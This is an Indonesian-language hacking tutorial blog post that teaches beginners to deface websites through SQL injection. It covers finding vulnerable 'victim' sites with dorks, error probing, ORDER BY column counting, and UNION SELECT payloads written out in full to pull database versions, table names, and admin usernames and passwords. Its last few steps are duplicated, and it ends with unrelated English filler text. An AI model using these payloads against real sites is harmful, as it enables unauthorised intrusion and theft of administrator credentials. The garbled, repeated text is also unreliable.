Hai sobat, apakah kalian tertarik dunia hacking tetapi tidak mengerti Hack/Deface website?
Tenang saja saya
akan memberikan sedikit ilmu saya tentang SQLi. Jika kamu bertanya apa itu
SQLi silahkan Klick Sini. Saya tidak ingin basa-basi marilah kita mulai
1. Siapkan Target websaite yang "Low Security" saran saya menggunakan dork bagi anda yang masih newbie. Agar lebih mudah dan cepat
2. jika sudah mendapatkan website yang "Low Security" tambahkan tanda ' (Petik) Diakhir URL korban. Fungsi ini untuk mengetahui Bugh web tersebut
Contohnya : www.target.com/index.php?id=1'
3. Jika terjadi Eror berarti website itu 75% dapat di Hack dengan cara SQLi ini. Jika sudah, mari kita cari colums web korban dengan cara menyisipkan code berikut ke URL korban. +order+by+[number]. jika kita masukan www.target.com/index.php?id=1+order+by+1-- ternyata masih Normal berarti kita harus mencari colums sampai web tersebut berubah menjadi eror.
Contohnya : www.target.com/index.php?id=1+order+by+7-- halaman eror, berarti kita ambil angka 6 kawan.
4. Semoga anda mengerti sampai tahap 3 diatas. Baik selanjutnya kita tambahkan Union select pada website korban. Fungsinya untuk mengetahui data dan informasi website korban
Contohnya : www.target.com/index.php?id=1+Union+Select+1,2,3,4,5,6-- mengapa sampai 6 karena pada Steps 3 kita mendapatkan Colums 6
5. Steps ini cukup menambahkan "+Union+Select+1,2,3,4,5,6--" Jadi seperti ini "+Union+Select+@@version,2,3,4,5,6--" and then ENTER
6. Ok, Tinggal kita cari nama Tablenya deh.. masukan Code ini kedalam website target " union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database()--
7. Apakah keluar Colums bernamakan admin_pass,admin_username dll. ? Jika ada masukan code berikut di URL korban union select 1,group_concat(admin_username,0x3a,admin_pass,0x3a)
8. Steps Terakhir, ganti "columname" dengan kolom yang anda mau ambil Data/Infonya. "0x3a" itu bagaikan titik (.) untuk pemisah kawan. jangan lupa merubah 'databasename.tablename'dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut."http://www.target.com/index.php?id=1+union+select+1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6+from+whippit.t_admin--"
Contohnya : www.target.com/index.php?id=1+Union+Select+1,2,3,4,5,6-- mengapa sampai 6 karena pada Steps 3 kita mendapatkan Colums 6
5. Steps ini cukup menambahkan "+Union+Select+1,2,3,4,5,6--" Jadi seperti ini "+Union+Select+@@version,2,3,4,5,6--" and then ENTER
6. Ok, Tinggal kita cari nama Tablenya deh.. masukan Code ini kedalam website target " union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database()--
7. Apakah keluar Colums bernamakan admin_pass,admin_username dll. ? Jika ada masukan code berikut di URL korban union select 1,group_concat(admin_username,0x3a,admin_pass,0x3a)
8. Steps Terakhir, ganti "columname" dengan kolom yang anda mau ambil Data/Infonya. "0x3a" itu bagaikan titik (.) untuk pemisah kawan. jangan lupa merubah 'databasename.tablename'dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut."http://www.target.com/index.php?id=1+union+select+1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6+from+whippit.t_admin--"
Author : Jnxnaufal
**Ini hanyalah ilmu, jangan disalahgunakan kawan
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.